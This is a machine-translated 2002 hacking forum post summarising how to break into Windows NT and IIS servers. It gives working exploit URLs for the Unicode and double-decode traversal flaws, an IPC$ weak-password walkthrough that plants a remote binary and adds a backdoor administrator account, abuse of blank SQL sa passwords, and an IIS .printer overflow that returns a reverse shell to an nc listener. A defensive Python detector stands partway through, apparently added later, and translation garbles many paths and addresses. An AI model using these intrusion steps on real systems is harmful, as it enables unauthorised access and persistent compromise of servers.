NT vulnerability summary and use | http://www.cshu.net





            NT vulnerability summary and use
            www.cshu.net  2002-12-17  fog rain village

              Ha-ha, the alliance's digest section already had this article before, and I always felt it was very good :)
              What I wanted was exactly this kind of familiar flavor, very nice ~~~
              I am posting the NT vulnerability summary! Xhacker also told me last night to study the technology well :) Ha-ha

              1. Encoding vulnerability intrusions
              1. Unicode intrusion
              Principle: when IIS decodes Unicode-encoded requests, a sequence such as %c1%1c is interpreted as "/", which lets a browser break out of the lowest-level permissions and read the hard disk contents.
              Operation method as follows:
              Http://127.0.0.1/scripts/.. %c1%1c.... em32/cmd.exe? /c dir 
              The above request accesses the C: drive of the host.
              (Permissions are those of IUSR_machinename)
              2. IIS CGI filename erroneous decoding vulnerability
              Principle: when IIS executes a CGI program, it performs two rounds of decoding. The first round applies HTTP decoding to the CGI filename and then checks whether the filename is an executable, for example by checking whether the extension is "exe" or "com". After the filename check passes, IIS performs a second round of decoding. Normally only the CGI parameters should be decoded at this point; however, IIS mistakenly decodes the already-decoded CGI filename together with the CGI parameters. As a result, the CGI filename is decoded twice.

              For example: IIS interprets ..%255c as ../
              Operation method as follows:
              Http://127.0.0.1/scripts/.. %255c.. %.. em32/cmd.exe? /c dir 
              The above request accesses the C: drive of the host.
              (Permissions are those of IUSR_machinename)
              2. Weak or blank password intrusions
              1. IPC weak password intrusion
              Principle: some network administrators have poor security awareness and set an administrator password that is too simple, or leave the administrator password blank. After establishing an IPC connection, a simple password guess obtains administrator privileges.
              Operation method as follows:
              C:\>net use \\127.0.0.1\ip "password" /user: "username" 
              C:\>copy srv.exe \\127.0.0.1\admin$\system32\srv.exe 
              C:\>net time 
              C:\>at \\127.0.0.1 time srv.exe 
              C:\>telnet 127.0.0.199 
              Login 127.0.0.1 
              C:\>net user newboys 12345 /add
              The command completed successfully. 
              C:\>net localgroup administrators newboys /add 
              The command completed successfully. 
              The above operation assumes that the target host has IPC sharing enabled and that you have a username and password with admin privileges. The target must also have the Schedule service running (so that the at command can be used).
              2. SQL Server default administrator (sa) blank password intrusion
              Principle: the default administrator (sa) password of MS SQL Server is blank, and sa runs with system privileges.
              Operation method as follows:
              Open the scanner tool ("the time") and press CTRL+R to bring up the host scanning setup dialog. Enter the start address and the end address, choose SQL as the host type, and click OK. The scanner then automatically checks whether port 1433 is open on the specified hosts. If it is open, it automatically tests whether the sa default password is blank. (Note: port 1433 is the default SQL port.) If the scanner finds that sa has a weak or blank password, you can then use the SQL remote command tool that ships with it (the shortcut key is CTRL+Q).
              SQLCMD>net user newboys 12345 /add
              The command completed successfully. 
              SQLCMD>net localgroup administrators newboys /add 
              The command completed successfully. 
              The tool used above can be downloaded from www.netxeyes.net or www.netxeyes.org; newboys recommends using it.
              3. Overflow intrusions
              1. IIS overflow intrusion
              Principle: by default, IIS 5.0 servers are installed with a "printer" application mapping, which uses the dynamic link library msw3prt.dll located under \WINNT\System32\. This function provides Web-based control of network printing; it is the application function through which Windows 2000 implements the Internet Printing Protocol (IPP). Unfortunately, this mapping has a buffer overflow bug that can crash Inetinfo.exe and allow an attacker to gain administrative control of the server through the web. The attacker sends a printer ISAPI request; when the HTTP Host parameter value reaches 420 characters, a buffer overflow occurs:
              GET /NULL.printer HTTP/1.0
              Host: [ buffer ]
              When the number of characters in [ buffer ] reaches 420, the buffer overflows.
              Operation method as follows:
              1. First, start a listening port on your own machine with NC.
              C:\>nc -l -p 99
              2. Run IIS5Exploit
              D:\> IIS5Exploit xxx.xxx.xxx.xxx 211.152.188.199
              ===========IIS5 English Version Printer Exploit. =========== 
              ===Written by Assassin 1995-2001.http://www.netXeyes.com=== 
              Connecting 211.152.188.1.. OK. 
              Send Shell Code.. OK 
              IIS5 Shell Code Send OK 
              211.152.188.1 directional local IP. 
              Wait a moment; if it succeeds, the NC listening port on your own machine shows:
              C:\>nc -l -p 99
              Microsoft Windows 2000 [Version 5.00.2195]
              (C) Copyright 1985-1999 Microsoft Corp. 
              C:\> 
              Commands can now be executed. For example:
              C:\>net user newboys 12345 /add
              The command completed successfully.
              C:\>net localgroup administrators newboys /add
              The command completed successfully.
              This creates a user newboys belonging to the Administrators group, with the password 12345.
              The IIS5 Printer Exploit used above can likewise be downloaded from www.netxeyes.net or www.netxeyes.org.
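As an added defender-side example (not code from the article or from netXeyes), the following Python classifies a single HTTP request line plus its headers against the three request-handling flaws described in sections 1 and 3: overlong-UTF-8 "Unicode" traversal, %25 double decoding of the CGI filename, and the oversized Host header on the .printer mapping. The sample requests, the "example.exe" placeholder and the extra overlong pairs %c0%af and %c1%9c are my assumptions; the 420-character threshold and the %c1%1c sequence come from the page.

```python
import re
from urllib.parse import unquote

# Overlong UTF-8 byte pairs the flawed IIS decoder turned into a path separator:
# %c1%1c is the pair quoted on the page; %c0%af and %c1%9c are the other widely
# published forms for '/' and '\' (my addition).
OVERLONG = re.compile(r"%c0%af|%c1%9c|%c1%1c", re.IGNORECASE)
HOST_LIMIT = 420  # Host header length at which the page says the .printer buffer overflows

def _escapes_root(path: str) -> bool:
    """True when a decoded path climbs above the virtual root (depth goes negative)."""
    depth = 0
    for seg in path.replace("\\", "/").split("/"):
        if seg == "..":
            depth -= 1
            if depth < 0:
                return True
        elif seg not in ("", "."):
            depth += 1
    return False

def classify_request(request_line: str, headers: dict) -> list:
    """Return the names of the page's attack patterns present in one HTTP request."""
    findings = []
    parts = request_line.split()
    target = parts[1] if len(parts) > 1 else "/"
    path = target.split("?", 1)[0]
    # 1. Unicode traversal: a correct decoder rejects the overlong bytes, so emulate
    #    the flawed one by substituting the separator it produced before normalising.
    if OVERLONG.search(path) and _escapes_root(unquote(OVERLONG.sub("/", path))):
        findings.append("unicode-traversal")
    # 2. Double decoding: inside the root after one decode (the filename check) but
    #    outside it after a second decode reproduces the CGI filename bug.
    once = unquote(path)
    if not _escapes_root(once) and _escapes_root(unquote(once)):
        findings.append("double-decode-traversal")
    # 3. .printer ISAPI overflow: oversized Host header on a .printer request.
    if path.lower().endswith(".printer") and len(headers.get("Host", "")) >= HOST_LIMIT:
        findings.append("printer-host-overflow")
    return findings

# Constructed sample requests (not taken from the article); "example.exe" is a placeholder.
SAMPLES = [
    ("GET /scripts/..%c1%1c../example.exe?/c+dir HTTP/1.0", {}),
    ("GET /scripts/..%255c..%255cexample.exe?/c+dir HTTP/1.0", {}),
    ("GET /NULL.printer HTTP/1.0", {"Host": "A" * 420}),
    ("GET /scripts/../index.html HTTP/1.0", {"Host": "example.test"}),
]
if __name__ == "__main__":
    for line, hdrs in SAMPLES:
        print(line, "->", classify_request(line, hdrs))
```

The same logic can be run over the cs-uri-stem and cs-host fields of IIS W3C logs to find past probes; a single-decode check alone misses the %255c form because the first decode still looks like a filename inside the root.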

              These are all the methods I commonly use when breaking into NT servers; of course, you also have to rely on your own analysis and put them together yourself :) Thanks to xhacker for his criticism and guidance; Arab League nine apologizes :)


              Original author: Nine cities become 
              Origin: Www.scuc.net 
